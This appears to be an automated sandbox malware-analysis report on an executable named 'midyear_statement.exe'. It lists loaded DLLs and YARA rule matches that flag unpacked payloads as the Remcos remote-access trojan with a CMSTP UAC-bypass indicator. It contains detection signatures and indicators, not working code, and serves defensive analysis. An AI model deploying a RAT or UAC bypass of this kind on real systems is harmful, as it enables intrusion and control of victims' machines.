Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\midyear_statement.exe	Section loaded: ??.dll	Jump to behavior

Uses 32bit PE files

Source: midyear_statement.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
